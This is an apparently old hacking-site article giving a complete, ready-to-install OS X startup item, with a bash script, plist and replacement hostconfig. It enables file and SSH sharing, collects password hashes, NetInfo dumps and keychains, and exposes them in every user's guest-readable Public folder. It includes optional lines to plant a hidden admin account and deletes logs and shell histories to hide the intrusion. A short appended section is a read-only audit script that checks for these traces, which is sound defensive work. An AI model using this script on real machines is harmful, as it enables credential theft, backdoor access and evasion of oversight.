..:: MacHacking.net ::..
Article from MacHacking.net Knowledge Base: http://kb.machacking.net

**********
Title: Sample OS X Startup Script
Author: DimBulb
Author Contact: marcmeadows100@hotmail.com
**********

This is an OS X startup item with a shell script to replace the current hostconfig file with a different copy (which has sharing turned on among other things). It also copies a few files and the NetInfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on and the information copied to the .info folder will contain the Mac password hashes and the SMB/NT4 hashes which are easier to crack.

There are three text blocks below. Save each as a separate text file using the names specified for each text block. Create a new folder called opener. Copy the three text files into that folder. Now place the folder in the /Library/StartupItems folder. Reboot.

If you don't want the AppleTalk hostname to change you could paste it into the new hostconfig file.

SAVE THIS AS A TEXT FILE CALLED opener

#! /bin/bash
# Opener script to turn on services and gather info
# You need an admin level user name and password or physical access (boot from a CD or firewire, ignore permissions on the internal drive) to install this
# It should go in /System/Library/StartupItems or /Library/StartupItems
# It should be in its own folder - the script and the folder must have the exact same name
# there should be two other files in that folder, the StartupParameters.plist for this script and your version of the hostconfig file (named hostconfig)

# Make sure we can overwrite the hostconfig file
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig

# backup their hostconfig file
mv /etc/hostconfig /etc/hostconfigold.old

# copy our own file in as hostconfig
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig

# create a hidden info folder and subfolders
mkdir /.info /.info/Library /.info/Library/Preferences /.info/private /.info/private/var /.info/keychains

# copy some interesting data and all the hashes into the info folder
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp -R /private/var/db /.info/private/var/db
cp -R /Library/Keychains/ /.info/Library/Keychains/
cp -R /Library/Preferences/DNSUpdate /.info/Library/Preferences/
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.info/System/Library/CoreServices/SystemVersion.plist
cp /Library/Preferences/Netopia/Netopia\ Preferences /.info/Library/Preferences/Netopia/Netopia\ Preferences

# change to the info folder directory
cd /.info

# grab netinfo user stuff and the MD5 hashes (for . and /) if this is OS X 10.2.8 or lower
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt

# change to the Users folder
cd /Users

# find each user's keychain files and copy them out to the info folder
find . -maxdepth 3 -mindepth 3 -name "Keychains" -type d -exec cp -R '{}' /.info/keychains \;

# change permissions on the info folders and all the stuff we collected
chmod -Rf 777 /.info

# now copy the info folder into the Public folder of each user (since sharing will be on at restart and guest is on by default anyone can get to them)
find . -maxdepth 2 -name "Public" -type d -exec cp -R /.info '{}/.info' \;

# uncomment the lines below to create an admin user named Hacker with password 1234
# note, this user will appear in their SystemPreferences accounts list!
#niutil -create / /users/hacker
#niutil -createprop / /users/hacker uid 401
#niutil -createprop / /users/hacker realname "Hacker"
#niutil -createprop / /users/hacker home "/private/var/root"
#niutil -createprop / /users/hacker shell "/bin/bash"
#niutil -createprop / /users/hacker gid 20
#niutil -createprop / /users/hacker passwd "rQ3p5/hpOpvGE"

# uncomment the next 2 lines if you want everyone to have full access to managed preferences (due to simple finder issues for instance)
#chmod -f 777 /Library
#chmod -Rf 777 /Library/ManagedPreferences

# Clean up after ourselves by removing logs
rm -Rf /private/var/log/
rm -Rf /Library/Logs/
rm -f /Library/Preferences/Netopia/Timbuktu\ Pro\ Log
rm -f /var/log/osxvnc.*
find . -maxdepth 2 -name ".bash_history" -exec rm -f '{}' \;

SAVE THIS AS A TEXT FILE CALLED StartupParameters.plist

Description opener Hide Messages start started stop stopped OrderPreference None Provides opener Requires Resolver

SAVE THIS AS A TEXT FILE CALLED hostconfig

##
# /etc/hostconfig
##
# This file is maintained by the system control panels
##

# Network configuration
HOSTNAME=-AUTOMATIC-
ROUTER=-AUTOMATIC-

# Services
AFPSERVER=-YES-
APPLETALK=-YES-
AUTHSERVER=-NO-
AUTOMOUNT=-YES-
CONFIGSERVER=-NO-
IPFORWARDING=-NO-
MAILSERVER=-NO-
NETBOOTSERVER=-NO-
NETINFOSERVER=-AUTOMATIC-
NISDOMAIN=-NO-
RPCSERVER=-AUTOMATIC-
TIMESYNC=-YES-
QTSSERVER=-NO-
SSHSERVER=-YES-
WEBSERVER=-YES-
CUPS=-YES-
DNSSERVER=-NO-
IPV6=-YES-
SMBSERVER=-YES-
APPLETALK_HOSTNAME=*41*

**********
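
Added example (not part of the original article): a read-only shell check for the on-disk traces this startup item leaves, namely the opener folder in StartupItems, the /.info staging folder and its copies under each Public folder, the hostconfigold.old backup, sharing services set to -YES- in hostconfig, and the deleted log directories. The function name audit_opener and the root-path argument are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the original article: read-only triage for the
# artifacts the opener startup item leaves on disk. ROOT is an assumption of
# this example so the check can also run against a mounted disk image.

audit_opener() {
    root="${1%/}"   # "/" becomes "" so the paths below stay well-formed

    # 1. The startup item folder itself (either install location)
    for d in "$root/Library/StartupItems/opener" \
             "$root/System/Library/StartupItems/opener"; do
        if [ -d "$d" ]; then echo "startup-item: $d"; fi
    done

    # 2. Hidden staging folder and the copies placed in each Public folder
    if [ -d "$root/.info" ]; then echo "staging-dir: $root/.info"; fi
    for p in "$root"/Users/*/Public/.info; do
        if [ -d "$p" ]; then echo "exposed-copy: $p"; fi
    done

    # 3. Swapped hostconfig: the backup name, plus sharing services set to
    #    -YES- (these can be legitimate, so treat them as items to review)
    if [ -e "$root/etc/hostconfigold.old" ]; then
        echo "hostconfig-backup: $root/etc/hostconfigold.old"
    fi
    if [ -f "$root/etc/hostconfig" ]; then
        for svc in AFPSERVER SMBSERVER SSHSERVER WEBSERVER; do
            if grep -q "^${svc}=-YES-" "$root/etc/hostconfig"; then
                echo "service-enabled: $svc"
            fi
        done
    fi

    # 4. Log directories that the script removes outright
    for l in "$root/private/var/log" "$root/Library/Logs"; do
        if [ ! -d "$l" ]; then echo "logs-missing: $l"; fi
    done
}

# Run only when a root path is given, e.g.: sh audit_opener.sh /
if [ "$#" -gt 0 ]; then audit_opener "$1"; fi
```

Each output line is one finding; an empty result means none of these traces were present under the given root.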